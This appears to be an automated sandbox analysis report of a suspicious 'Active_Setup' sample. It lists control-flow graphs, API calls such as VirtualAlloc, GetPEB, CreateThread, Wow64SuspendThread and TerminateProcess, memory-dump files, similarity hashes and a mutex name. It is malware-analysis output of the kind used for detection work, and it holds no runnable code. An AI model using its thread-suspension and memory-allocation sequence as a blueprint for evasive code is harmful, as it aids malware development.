control_flow_graph 1618 fb63f0-fb781c GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1920 fb782e-fb7844 call fb7360 1618->1920 1921 fb781e-fb7821 1618->1921 1927 fb7863-fb786b 1920->1927 1928 fb7846-fb7862 1920->1928 1921->1920 1923 fb7823-fb782b call fca3c0 1921->1923 1923->1920
APIs
• GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
• GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: &}
• API String ID: 1646373207-4269328691
• Opcode ID: 9f79325609c8ae43d1c0f457f92fe39317ba395a80035addce73d021e0117cba
• Instruction ID: 153558f840ae96dbce8f17c831e081bd12d8e1f766a4f99765fa52698a65c090
• Opcode Fuzzy Hash: 9f79325609c8ae43d1c0f457f92fe39317ba395a80035addce73d021e0117cba
• Instruction Fuzzy Hash: E0A213729103258FD768EFB6EC9B16A37A2FB90300346862ED4C29794DDF3F54469B81

Control-flow Graph

control_flow_graph 1930 9402b9-940421 call 940869 call 940e69 call 941019 call 940c09 1939 940427-94042e 1930->1939 1940 940852-940855 1930->1940 1941 940439-94043d 1939->1941 1942 94045f-9404da GetPEB 1941->1942 1943 94043f-94045d call 940d89 1941->1943 1944 9404e5-9404e9 1942->1944 1943->1941 1946 940501-940513 call 9409c9 1944->1946 1947 9404eb-9404ff 1944->1947 1953 940515-94053b 1946->1953 1954 94053d-94055e CreateThread 1946->1954 1947->1944 1955 940561-940565 1953->1955 1954->1955 1957 940826-940850 TerminateProcess 1955->1957 1958 94056b-94059e call 940ec9 1955->1958 1957->1940 1958->1957 1962 9405a4-9405f3 1958->1962 1964 9405fe-940604 1962->1964 1965 940606-94060c 1964->1965 1966 94064c-940650 1964->1966 1967 94060e-94061d 1965->1967 1968 94061f-940623 1965->1968 1969 940656-940663 1966->1969 1970 94071e-940811 call 9409c9 call 940869 call 940e69 1966->1970 1967->1968 1971 940625-940633 1968->1971 1972 94064a 1968->1972 1973 94066e-940674 1969->1973 1996 940816-940820 1970->1996 1997 940813 1970->1997 1971->1972 1974 940635-940647 1971->1974 1972->1964 1977 9406a4-9406a7 1973->1977 1978 940676-940684 1973->1978 1974->1972 1981 9406aa-9406b1 1977->1981 1979 940686-940695 1978->1979 1980 9406a2 1978->1980 1979->1980 1983 940697-9406a0 1979->1983 1980->1973 1981->1970 1985 9406b3-9406bc 1981->1985 1983->1977 1985->1970 1988 9406be-9406ce 1985->1988 1990 9406d9-9406e5 1988->1990 1992 940716-94071c 1990->1992 1993 9406e7-940714 1990->1993 1992->1981 1993->1990 1996->1957 1997->1996
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0094055C
• TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00940850
Strings
Memory Dump Source
• Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
Yara matches
Similarity
• API ID: CreateProcessTerminateThread
• String ID: ]u4*$9s=
• API String ID: 1197810419-84510002
• Opcode ID: 281e4224f5a08ab22d1ad742d5625bf4df9fd6a55c799a333b5da2afaf4d0580
• Instruction ID: c5868ff6e4fc3ef743c75edd9daace381f448698596a35ca11d7951b5532c825
• Opcode Fuzzy Hash: 281e4224f5a08ab22d1ad742d5625bf4df9fd6a55c799a333b5da2afaf4d0580
• Instruction Fuzzy Hash: A012C3B0E00219DFDB14DF98C990BADBBB2FF88304F2486A9D615AB385C7356A51CF54

Control-flow Graph

control_flow_graph 1998 fb65a0-fb65c1 1999 fb65cc-fb781c call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1998->1999 2000 fb65c7 call ffb542 1998->2000 2284 fb782e-fb7844 call fb7360 1999->2284 2285 fb781e-fb7821 1999->2285 2000->1999 2291 fb7863-fb786b 2284->2291 2292 fb7846-fb7862 2284->2292 2285->2284 2287 fb7823-fb782b call fca3c0 2285->2287 2287->2284
APIs
• GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
• VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AddressAllocProcVirtual
• String ID: &}
• API String ID: 2770133467-4269328691
• Opcode ID: 9d449ce88e24e0f79229d0e62c674682a15fd3f64e53785be1acf963676aebfb
• Instruction ID: 68d3196ee2392d9673e7761c3253d535b53fe67215e02ac8372ce7977549491b
• Opcode Fuzzy Hash: 9d449ce88e24e0f79229d0e62c674682a15fd3f64e53785be1acf963676aebfb
• Instruction Fuzzy Hash: FA9213729003258FD768EFB6EC9B16A37A2FB90310346862ED4C29794DDF3F54469B81

Control-flow Graph

control_flow_graph 2294 fb6600-fb6623 2295 fb662e-fb781c call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 2294->2295 2296 fb6629 call ff95d7 2294->2296 2578 fb782e-fb7844 call fb7360 2295->2578 2579 fb781e-fb7821 2295->2579 2296->2295 2585 fb7863-fb786b 2578->2585 2586 fb7846-fb7862 2578->2586 2579->2578 2581 fb7823-fb782b call fca3c0 2579->2581 2581->2578
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 2770133467-4269328691
                                                                                                                                                  • Opcode ID: b8ac3f6f540d335c4ce85243e2f98dfc4417f26725c484aa60e0f6395d336d8d
                                                                                                                                                  • Instruction ID: 93a4292d1a988ce40a3388b4db28c64da785348d511df89af7d9c917e5807fd9
                                                                                                                                                  • Opcode Fuzzy Hash: b8ac3f6f540d335c4ce85243e2f98dfc4417f26725c484aa60e0f6395d336d8d
                                                                                                                                                  • Instruction Fuzzy Hash: AF9223729003258FD768EFB6EC9B16A37A2FB90300346862ED4C29794DDF3F54469B81

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 2588 9409c9-940a10 CreateToolhelp32Snapshot 2591 940ae6-940ae9 2588->2591 2592 940a16-940a37 Thread32First 2588->2592 2593 940ad2-940ae1 2592->2593 2594 940a3d-940a43 2592->2594 2593->2591 2595 940a45-940a4b 2594->2595 2596 940ab2-940acc 2594->2596 2595->2596 2597 940a4d-940a6c 2595->2597 2596->2593 2596->2594 2597->2596 2600 940a6e-940a72 2597->2600 2601 940a74-940a88 Wow64SuspendThread 2600->2601 2602 940a8a-940a99 2600->2602 2603 940a9e-940ab0 CloseHandle 2601->2603 2602->2603 2603->2596
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0094050F,?,00000001,?,81EC8B55,000000FF), ref: 00940A07
• Thread32First.KERNEL32(00000000,0000001C), ref: 00940A33
• Wow64SuspendThread.KERNEL32(00000000), ref: 00940A86
• CloseHandle.KERNEL32(00000000), ref: 00940AB0
Memory Dump Source
• Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
Yara matches
Similarity
• API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
• String ID:
• API String ID: 1849706056-0
• Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction ID: 9254b1df37b8ce6cedb12fd73ea3417ca6bcc02da151e3874174235921068232
• Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction Fuzzy Hash: 8C41ED75A00209AFDB18DF98C494FADB7F6EFC8300F10C169E6159B794DA34AE45CB94

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 2607 940879-9408d0 GetPEB 2608 9408db-9408df 2607->2608 2609 9408e5-9408f0 2608->2609 2610 94097f-940986 2608->2610 2612 9408f6-94090d 2609->2612 2613 94097a 2609->2613 2611 940991-940995 2610->2611 2615 9409a6-9409ad 2611->2615 2616 940997-9409a4 2611->2616 2617 940932-94094a CreateThread 2612->2617 2618 94090f-940930 2612->2618 2613->2608 2621 9409b6-9409bb 2615->2621 2622 9409af-9409b1 2615->2622 2616->2611 2619 94094e-940956 2617->2619 2618->2619 2619->2613 2623 940958-940975 2619->2623 2622->2621 2623->2613
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00940945
Strings
Memory Dump Source
• Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878
• Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction ID: 10a8b2802acc4ce8528046edd39b15237a743a40f01df353e7c06eb4b5abdf5a
• Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction Fuzzy Hash: 1841C274A00209EFDB14CF98C994BAEB7B1BF88314F208698D515AB391C775AE81DF94
APIs
• VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 87618e3beb5da5f86094ee3286f14d171b0cf1d8750964c458981a0e2a5cd054
• Instruction ID: 1fad810b7222c35f5c5405f25137a504feb6f9e44f79f7a782fd93f91196f738
• Opcode Fuzzy Hash: 87618e3beb5da5f86094ee3286f14d171b0cf1d8750964c458981a0e2a5cd054
• Instruction Fuzzy Hash: 40D12276D003258FC768EFB5EC8B16A3762FB90304785862ED4C29794DDB3F55468B82
APIs
• VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 5b4a4d5d2de60def9871a2dc073e6b9a2df40ba55426148c46e30db70b473942
• Instruction ID: 0824cdd0a63ff38d23e4e530f3d177fd54194c797765d3f8d6542dd41d32927f
• Opcode Fuzzy Hash: 5b4a4d5d2de60def9871a2dc073e6b9a2df40ba55426148c46e30db70b473942
• Instruction Fuzzy Hash: FAB133769003258FC764EFB9FC8B16A3762FB90304789462ED4C287A4DDB3F55468B86
APIs
• VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: b9bca80428ef077cbc548b993cc6f02218c735e15059e5894aec5546a2bbef7b
• Instruction ID: 591b7d819ca619db6ebbde74997f6281c73cfb51e9bfe3a6cd6ae66e47201a1d
• Opcode Fuzzy Hash: b9bca80428ef077cbc548b993cc6f02218c735e15059e5894aec5546a2bbef7b
• Instruction Fuzzy Hash: 9651DFB69003258FC768EFB9FC8716A3662BB91304389922ED5C28794DDF3F51458B86
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                  • Opcode ID: 1e5d6f44d00092defcea7113a54adfb284d6ae16bb88fc5a32ee7521e6e081e2
                                                                                                                                                  • Instruction ID: 1a9c3f559512f8c19f6e55c321d369cb06b61776eba793fc9e17f46853d4a60a
                                                                                                                                                  • Opcode Fuzzy Hash: 1e5d6f44d00092defcea7113a54adfb284d6ae16bb88fc5a32ee7521e6e081e2
                                                                                                                                                  • Instruction Fuzzy Hash: 8B6165768003248FC764EF79EC8B1AA3761FB90314745522ED9C28BA0DDB3F554A8BC6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7ff982de4d974110e1e73dbb3b302de19d6c99b28f3638df10deb8efb5a09690
                                                                                                                                                  • Instruction ID: 7e5e953311e0e5db1abd856f04d5e5668206159dadafdc22c92f1f4601e58605
                                                                                                                                                  • Opcode Fuzzy Hash: 7ff982de4d974110e1e73dbb3b302de19d6c99b28f3638df10deb8efb5a09690
                                                                                                                                                  • Instruction Fuzzy Hash: 4941797B8043244FC760EF79EC8A2A63761BFD1314B85562DD8C28B609DB3F544A8BC6
Control-flow Graph
control_flow_graph 2604 109e370-109e39c CreateMutexW GetLastError call 1080748 2606 109e3a1-109e3a2 2604->2606
APIs
• CreateMutexW.KERNEL32(00000000,00000000,Global\EUDLOG_LOG_H_XXX_), ref: 0109E379
• GetLastError.KERNEL32 ref: 0109E384
Strings
• Global\EUDLOG_LOG_H_XXX_, xrefs: 0109E370
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID: Global\EUDLOG_LOG_H_XXX_
• API String ID: 1925916568-695966051
• Opcode ID: 88ab23e106b1ecdc887b5fdd706753d5730cdb0d500ec535e9ef9e9b9cb7f12e
• Instruction ID: b5c3d694e2e1432d6b488bcf40eaa8597e46285fde1e10fa7cc9288f9e3e2564
